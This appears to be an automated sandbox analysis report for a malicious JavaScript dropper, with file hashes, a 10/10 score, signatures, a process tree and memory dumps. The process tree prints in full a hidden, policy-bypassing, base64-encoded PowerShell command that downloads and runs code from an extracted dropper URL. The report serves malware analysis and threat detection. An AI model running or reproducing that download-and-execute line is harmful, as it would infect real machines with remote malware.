Analysis

  • max time kernel
    0s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    06-01-2024 10:06

General

  • Target

    45eba6f313f6042b4f0d026f2454c4c6.js

  • Size

    72KB

  • MD5

    45eba6f313f6042b4f0d026f2454c4c6

  • SHA1

    f70c24851d9c0588b84906f719de779294622a1f

  • SHA256

    a151649d286219f797af47de4299140d797c14ba0a733042b9c252c2da8e6684

  • SHA512

    ab5e44e8eea52349d251b5e5d7b2b61723fff4889cc4a64cf09019762d93f89d8c2a0c7cbd9ae704b9c6cd063dec8f3d14adff3765dd024ecb2a77282364a3e2

  • SSDEEP

    1536:hSvVfD5Xm9Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bs:hStfDs9Ry98guHVBqqg2bcruzUHmLKeg

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://smart-integrator.hr/pornhub.php

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\45eba6f313f6042b4f0d026f2454c4c6.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1764
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
      2⤵
        PID:2224
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
      1⤵
        PID:2388

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2388-6-0x0000000002860000-0x0000000002868000-memory.dmp

        Filesize

        32KB

      • memory/2388-7-0x000007FEF5680000-0x000007FEF601D000-memory.dmp

        Filesize

        9.6MB

      • memory/2388-9-0x000007FEF5680000-0x000007FEF601D000-memory.dmp

        Filesize

        9.6MB

      • memory/2388-11-0x00000000028F0000-0x0000000002970000-memory.dmp

        Filesize

        512KB

      • memory/2388-10-0x00000000028F0000-0x0000000002970000-memory.dmp

        Filesize

        512KB

      • memory/2388-8-0x00000000028F0000-0x0000000002970000-memory.dmp

        Filesize

        512KB

      • memory/2388-5-0x000000001B6A0000-0x000000001B982000-memory.dmp

        Filesize

        2.9MB

      • memory/2388-12-0x000007FEF5680000-0x000007FEF601D000-memory.dmp

        Filesize

        9.6MB